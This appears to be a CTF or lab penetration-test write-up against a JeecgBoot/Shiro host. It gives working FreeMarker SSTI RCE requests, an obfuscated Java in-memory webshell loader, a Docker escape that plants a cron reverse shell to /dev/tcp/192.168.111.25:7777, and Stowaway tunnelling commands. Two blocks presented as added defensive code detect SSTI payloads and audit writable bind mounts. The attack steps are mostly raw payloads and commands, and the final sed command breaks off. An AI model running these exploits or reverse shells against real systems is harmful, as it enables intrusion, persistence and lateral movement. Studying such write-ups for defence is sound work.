
Information Gathering
```bash
# nmap: --min-rate 10000   scan at a rate of 10000 packets/s
#       -p-                all ports
#       -p80,135           scan only ports 80 and 135
#       -sU                UDP scan
#       -sT                TCP connect scan
#       -sV                service version detection
#       -sC                default script scan
#       -O                 OS and version detection
#       --script=vuln      basic vulnerability scan
nmap -p- --min-rate 10000 192.168.111.22
nmap -p- -sU --min-rate 10000 192.168.111.22
nmap -p22,3306,6379,18088,18080 --script=vuln 192.168.111.22
nmap -p22,3306,6379,18088,18080 -sV -sC -sT -O 192.168.111.22
```

According to the scan results, the open ports are SSH (22), MySQL (3306), Redis (6379), Apache Tomcat returning 404 (18088) and HTTP (18080).
Vulnerability Discovery
Brute-forced SSH (22), MySQL (3306) and Redis (6379)

MySQL weak password
192.168.111.22:3306 root/root

Redis unauthenticated access
192.168.111.22:6379

http://192.168.111.22:18088/ returns 404; ran a directory scan

Web System
http://192.168.111.22:18088/jeecg-boot/jmreport/list

http://192.168.111.22:18080/

Exploitation
MySQL RCE (failed)
For MySQL background, see 国光's article "MySQL Exploitation and Privilege Escalation"
(the original link is dead; a repost is available: "MySQL Exploitation and Privilege Escalation (repost)")
```sql
show global variables like '%secure_file_priv%';
```

| Value | Meaning |
|---|---|
| NULL | import and export are not allowed |
| /tmp | import and export are allowed only under /tmp |
| (empty) | no directory restriction |

Redis RCE (failed)
Here it is easiest to use GitHub - DeEpinGh0st/MDUT-Extend-Release: MDUT-Extend (extended version) directly
Background: Summary of Redis unauthenticated access exploitation

http://192.168.111.22:18080/

Tried file upload and file read; both failed. A weak password exists, but the page behind it has not been developed.
Weak password
```http
POST /admin/doLogin HTTP/1.1
Host: 192.168.111.22:18080
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=admin&password=123456
```

On login, the Shiro framework was found; brute-forcing the key failed.


Jeecg-Boot RCE (success)
http://192.168.111.22:18088/jeecg-boot/jmreport/list

Went straight for an n-day. Because the arbitrary file upload here requires a login, the SSTI template injection was chosen instead.
GitHub - MInggongK/jeecg-: jeecg comprehensive vulnerability exploitation tool

queryFieldBySql SSTI template injection
```http
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.111.22:18088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/json
Content-Length: 99

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami \") }' "}
```

In-memory shell: GitHub - pen4uin/java-memshell-generator: A customizable Java in-memory webshell generation tool

```http
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.111.22:18088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/json
Content-Length: 16172

{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='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';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}
```

http://192.168.111.22:18088/jeecg-boot/jmreport/queryFieldBySql
Password: test
Request header: User-Agent: Bhimaw

loadTableData SSTI template injection
```http
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13
Content-Type: application/json; charset=utf-8
Content-Length: 165
Host: 192.168.111.22:18088
Connection: keep-alive
Accept-Encoding: gzip, deflate, br

{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}
```
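Both SSTI requests above (queryFieldBySql and loadTableData) smuggle FreeMarker directives inside the JSON `sql` field. The following detector, an added example written for defenders and not part of the original writeup, flags those constructs in request bodies to the two JimuReport endpoints; the sample traffic is constructed here and the path list and payload shapes are taken from the requests shown above.

```python
"""Flag FreeMarker SSTI payloads in JimuReport 'sql' fields (added defensive example)."""
import json
import re

# Endpoints from the writeup that pass a user-supplied "sql" field to the
# template engine in vulnerable builds. Extend for your deployment.
WATCHED_PATHS = {
    "/jeecg-boot/jmreport/queryFieldBySql",
    "/jeecg-boot/jmreport/loadTableData",
}

# FreeMarker constructs that have no place inside a SQL string: the ?new()
# builtin instantiating a class, the Execute / ObjectConstructor utility
# classes, <#assign> directives and ${ ... } interpolations that call something.
SSTI_PATTERNS = [
    re.compile(r"freemarker\.template\.utility\.(Execute|ObjectConstructor)", re.I),
    re.compile(r"\?\s*new\s*\(", re.I),
    re.compile(r"<#\s*assign\b", re.I),
    re.compile(r"\$\{[^}]*\(", re.I),
]

def scan_request(path: str, body: str) -> list[str]:
    """Return the regexes matched by one request's sql field (empty list = clean)."""
    if path not in WATCHED_PATHS:
        return []
    try:
        fields = json.loads(body)
        sql = str(fields.get("sql", "")) if isinstance(fields, dict) else body
    except json.JSONDecodeError:
        sql = body  # malformed JSON: scan the raw body rather than skip it
    return [p.pattern for p in SSTI_PATTERNS if p.search(sql)]

# Constructed sample traffic (not captured from any real host).
SAMPLES = [
    ("/jeecg-boot/jmreport/loadTableData",
     '{"sql":"select id, name from t_user where status = 1","pageNo":1}'),
    ("/jeecg-boot/jmreport/queryFieldBySql",
     '{"sql":"select \'<#assign ex=\\"freemarker.template.utility.Execute\\"?new()> ${ ex(\\"whoami\\") }\' "}'),
    ("/jeecg-boot/jmreport/queryFieldBySql",
     '{"sql":"call${\\"freemarker.template.utility.ObjectConstructor\\"?new()(\\"javax.script.ScriptEngineManager\\")}","type":"0"}'),
    ("/jeecg-boot/sys/login", '{"sql":"<#assign x=1>"}'),  # not a watched endpoint
]

def alerts() -> list[tuple[str, int]]:
    """(path, number of indicators hit) for every sample request that fires."""
    return [(p, len(h)) for p, b in SAMPLES if (h := scan_request(p, b))]
```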

http://192.168.111.22:18080/
The source was found at /home/ubuntu/doctool.jar; download it and decompile it.

/doctool.jar!/BOOT-INF/classes/com/example/doctoolkit/shiro/ShiroConfig.class
Found the Shiro key: QZIysgMYhG7/CzIJlVpR1g==

GitHub - SummerSec/ShiroAttack2: comprehensive Shiro deserialization exploitation tool (command execution with output echo / in-memory shell injection), fixing the NoCC issue of the original https://github.com/j1anFen/shiro_attack

Docker Escape
Found that we are currently inside a Docker environment
```bash
cat /proc/1/cgroup

ls -la /.dockerenv

df -h
```

Hm, what's going on here? Let's look at the Shiro environment again.

Path: http://192.168.111.22:18080/test
Password: pass1024


Found a mount: the mounted directory is a directory on the host.

There is a flag here: flag{nItAM4shIzhenN1ubi}
Escape through the mount via a cron job
```bash
# 1. Change into the host's tmp directory (mounted into the container)
cd /dev/tmp/tmp
# 2. Create test.sh and write its contents
cat > test.sh << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
sh -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/sh -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
EOF
# 3. Make it executable
chmod +x test.sh
# 4. Reverse shell via cron job
sed -i
```

```bash
nc -lv 7777
```
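The escape above only works because a host directory is bind-mounted read-write into the container. The following audit, an added example for defenders and not part of the writeup, walks `docker inspect`-style `Mounts` entries and reports writable bind mounts, rating those on cron, systemd or Docker-socket paths as high; the sample entries are constructed, and the host-path list is an assumption to tune per environment.

```python
"""Audit container mounts for writable host bind mounts (added defensive example)."""
import json
from typing import Iterable

# Host locations where a writable bind mount lets the container change what
# the host runs (cron spools, unit files) or talk to the Docker daemon.
# Assumed list; extend for your environment.
HIGH_RISK_HOST_PATHS = (
    "/etc", "/etc/cron.d", "/var/spool/cron", "/etc/systemd",
    "/root", "/var/run/docker.sock", "/run/docker.sock",
)

def _under(path: str, prefix: str) -> bool:
    """True if `path` equals `prefix` or lies beneath it."""
    return path == prefix or path.startswith(prefix.rstrip("/") + "/")

def audit_mounts(mounts: Iterable[dict]) -> list[dict]:
    """One finding per bind mount the container can write to. Any writable
    host directory is at least medium (the writeup escaped via a tmp dir);
    sensitive host paths are high."""
    findings = []
    for m in mounts:
        if m.get("Type") != "bind":
            continue  # named volumes and tmpfs are not host paths
        src, dst, rw = m.get("Source", ""), m.get("Destination", ""), m.get("RW", True)
        if not rw:
            continue  # read-only bind mounts cannot be used to plant files
        high = src == "/" or any(_under(src, p) for p in HIGH_RISK_HOST_PATHS)
        findings.append({"source": src, "destination": dst,
                         "severity": "high" if high else "medium"})
    return findings

def audit_inspect_output(inspect_json: str) -> list[dict]:
    """Run the audit over raw `docker inspect <container>...` output."""
    findings = []
    for container in json.loads(inspect_json):
        for f in audit_mounts(container.get("Mounts", [])):
            findings.append({"container": container.get("Name", "?"), **f})
    return findings

# Constructed sample: a host tmp dir mounted RW (as in the writeup), a writable
# cron directory, a read-only log mount and a named volume.
SAMPLE_INSPECT_MOUNTS = json.loads("""[
  {"Type": "bind", "Source": "/tmp", "Destination": "/dev/tmp", "RW": true},
  {"Type": "bind", "Source": "/etc/cron.d", "Destination": "/host-cron", "RW": true},
  {"Type": "bind", "Source": "/var/log/app", "Destination": "/logs", "RW": false},
  {"Type": "volume", "Source": "/var/lib/docker/volumes/db/_data", "Destination": "/var/lib/mysql", "RW": true}
]""")
```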

One-hop proxy into the internal network
```
root@wty-virtual-machine:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b1:3a:e7 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.111.22/24 brd 192.168.111.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb1:3ae7/64 scope link
       valid_lft forever preferred_lft forever
3: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:b1:62:bf brd ff:ff:ff:ff:ff:ff
    altname enp2s1
    inet 192.168.80.50/24 brd 192.168.80.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb1:62bf/64 scope link
       valid_lft forever preferred_lft forever
4: br-2ed9e624a55e: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:86:33:b1:e6 brd ff:ff:ff:ff:ff:ff
    inet 172.20.0.1/16 brd 172.20.255.255 scope global br-2ed9e624a55e
       valid_lft forever preferred_lft forever
    inet6 fe80::42:86ff:fe33:b1e6/64 scope link
       valid_lft forever preferred_lft forever
5: br-5c4f24880ae8: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:90:1f:d0:a6 brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-5c4f24880ae8
       valid_lft forever preferred_lft forever
6: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:7a:e0:9d:e5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
7: br-a8cbb2f18fd5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:a1:8e:71:2a brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-a8cbb2f18fd5
       valid_lft forever preferred_lft forever
    inet6 fe80::42:a1ff:fe8e:712a/64 scope link
       valid_lft forever preferred_lft forever
9: vethb31e178@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default
    link/ether 2a:fa:8c:44:8f:42 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::28fa:8cff:fe44:8f42/64 scope link
       valid_lft forever preferred_lft forever
11: veth330c26c@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default
    link/ether 7a:0a:7e:fa:82:14 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::780a:7eff:fefa:8214/64 scope link
       valid_lft forever preferred_lft forever
13: vethea4b282@if12: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default
    link/ether 46:70:f8:09:e5:9b brd ff:ff:ff:ff:ff:ff link-netnsid 2
    inet6 fe80::4470:f8ff:fe09:e59b/64 scope link
       valid_lft forever preferred_lft forever
15: veth6409444@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-a8cbb2f18fd5 state UP group default
    link/ether ea:0d:25:9a:29:33 brd ff:ff:ff:ff:ff:ff link-netnsid 3
    inet6 fe80::e80d:25ff:fe9a:2933/64 scope link
       valid_lft forever preferred_lft forever
root@wty-virtual-machine:~#
```

GitHub - ph4ntonn/Stowaway: 👻Stowaway – Multi-hop Proxy Tool for pentesters
```bash
./linux_x64_agent -c 192.168.111.25:9999 -s pass --reconnect 10
./macos_arm64_admin -l 9999 -s pass
```

```
use 0
socks 55667 123 123
```


